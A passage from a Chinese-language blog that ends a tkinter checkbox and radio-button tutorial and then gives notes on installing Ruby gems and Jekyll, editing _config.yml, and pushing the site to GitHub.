     chVarEn = tk.IntVar() check3 = tk.Checkbutton(win,text="Enabled",variable=chVarEn) check3.select() check3.grid(column=2,row=4,sticky=tk.W)

  7. 单选框 还是三行搞定 先创建tk的字符串变量实例radVar。 再创建tk的单选框实例。 第三行设置一下坐标。

     1 2 3

     radVar = tk.IntVar() rad1=tk.Radiobutton(xx,text=COLOR1,variable=radVar,value=1,command=radCall) rad1.grid(column=0,row=5,sticky=tk.W)

参考资料：

• adding-a-jekyll-theme-to-your-github-pages-site-with-the-jekyll-theme-chooser
• NexT主题修改配置
• jekyll快速指南

依赖

1
2
3

gem source -l
gem source -r xxx
gem source -a http://gems.rubyforge.org/

如果运行结果是404，需要换一个源，再重新试试。

1
2
3

gem install bundler
bundler install
gem update --system

• bundle install 报错？？ vi /root/.bundle/config 其中的url改为”https://rubygems.org”
• bundle install报错？？ 运行后报错：gem install nokogiri 安装：apt-get install libxslt-dev libxml2-dev

修改配置

对于该模板，修改_config.yml能够修改网页配置。 其中有一些参数：

• Schemes 是网页的主题，一般有预设的主题，但是可以更改。
• title 会显示在页面最上方。
• author 自己的昵称，在主页会进行介绍。
• image 是markdown存放的图片地址，一般在assets目录下。

文档属于Foo这个文件夹。

文档末尾的标记，方便索引

本地配置jekyll 静态站点

jekyll这个静态页面生成程序是用ruby写的，所以需要ruby环境，安装gem(类似python里的pip)，之后再用gem安装jekyll程序。

安装jekyll依赖的程序。 最后运行转到blog目录，运行jekyll，即可用浏览器在本地访问我的blog。

具体方式请查看上面的参考资料。

最后确认所有配置都修改完毕了，就准备将修改推送到远程github的仓库。

1
2
3

git add .
git commit -m "update"
git push origin master